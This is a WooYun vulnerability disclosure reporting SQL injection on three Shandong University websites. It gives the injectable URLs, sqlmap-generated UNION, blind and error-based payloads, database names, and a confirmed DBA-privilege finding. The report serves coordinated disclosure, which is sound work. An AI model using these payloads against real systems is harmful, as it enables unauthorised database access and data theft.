当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0165109

漏洞标题:山东大学多站SQL注入

相关厂商:山东大学

漏洞作者: 路人甲

提交时间:2015-12-28 13:00

修复时间:2016-02-09 23:29

公开时间:2016-02-09 23:29

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-28: 细节已通知厂商并且等待厂商处理中
2015-12-29: 厂商已经确认,细节仅向厂商公开
2016-01-08: 细节向核心白帽子及相关领域专家公开
2016-01-18: 细节向普通白帽子公开
2016-01-28: 细节向实习白帽子公开
2016-02-09: 细节向公众公开

简要描述:

山东大学多站SQL注入

详细说明:

1.注入点:http://www.hglx.sdu.edu.cn/article.php?id=764

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 160 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=764 AND 5432=5432
Type: UNION query
Title: MySQL UNION query (NULL) - 37 columns
Payload: id=-4328 UNION ALL SELECT 16,16,16,16,16,16,16,16,CONCAT(0x7176706271,0x5744684c69474559504d,0x7178717a71),16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: id=764 AND (SELECT * FROM (SELECT(SLEEP(100)))PgMm)
---
[09:20:24] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 or Vista
web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0.11


web server operating system: Windows 2008 or Vista
web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0.11
[09:20:38] [INFO] fetching current user
sqlmap got a 302 redirect to 'http://www.hglx.sdu.edu.cn:80/index.php'. Do you want to follow? [Y/n] n
current user: 'sq_hanguoliuxue@%'
available databases [2]:
[*] information_schema
[*] sq_hanguoliuxue


1.png

2.png


GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 160 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=764 AND 5432=5432
Type: UNION query
Title: MySQL UNION query (NULL) - 37 columns
Payload: id=-4328 UNION ALL SELECT 16,16,16,16,16,16,16,16,CONCAT(0x7176706271,0x5744684c69474559504d,0x7178717a71),16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: id=764 AND (SELECT * FROM (SELECT(SLEEP(100)))PgMm)
---
[09:20:24] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 or Vista
web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0.11


web server operating system: Windows 2008 or Vista
web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0.11
[09:20:38] [INFO] fetching current user
sqlmap got a 302 redirect to 'http://www.hglx.sdu.edu.cn:80/index.php'. Do you want to follow? [Y/n] n
current user: 'sq_hanguoliuxue@%'
available databases [2]:
[*] information_schema
[*] sq_hanguoliuxue


1.png

2.png

漏洞证明:

2.注入点:http://yinshi.wh.sdu.edu.cn/show.php?filed_id=72
yinshi.wh.sdu.edu.cn/show.php?filed_id=-72 UNION SELECT ALL 1,2,3,4,5,6,7,8,9

GET parameter 'filed_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 69 HTTP(s) requests:
---
Parameter: filed_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: filed_id=72 AND 3076=3076
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: filed_id=-7442 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a707171,0x68597a6370495452576c,0x7170717171),NULL,NULL,NULL--
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: filed_id=72 AND (SELECT * FROM (SELECT(SLEEP(100)))pDsO)
---
[09:13:30] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0.11


web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
[09:13:49] [INFO] fetching current user
current user: 'yinshi@localhost'
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
[09:14:01] [INFO] fetching database names
[09:14:03] [INFO] the SQL query used returns 3 entries
[09:14:04] [INFO] retrieved: information_schema
[09:14:05] [INFO] retrieved: test
[09:14:06] [INFO] retrieved: yinshi
available databases [3]:
[*] information_schema
[*] test
[*] yinshi


1.png

2.png

3.png


3.注入点:http://sv13.wljy.sdu.edu.cn:1500/listArticle.aspx?ColumnId=1&PageNo=1

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 36 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://sv13.wljy.sdu.edu.cn:1500/listArticle.aspx?ColumnId=1' AND 8948=8948 AND 'tLIT'='tLIT&PageNo=1
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: http://sv13.wljy.sdu.edu.cn:1500/listArticle.aspx?ColumnId=1' AND 3405=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(98)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (3405=3405) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(113))) AND 'KbrS'='KbrS&PageNo=1
---
[02:45:37] [INFO] testing Microsoft SQL Server
[02:45:42] [INFO] confirming Microsoft SQL Server
[02:46:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005


available databases [1]:
[*] EntrolExam


dba权限

web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
[02:57:21] [INFO] testing if current user is DBA
current user is DBA: True


1.png

2.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-12-29 09:44

厂商回复:

已通报系统所属单位

最新状态:

暂无


漏洞评价:

评价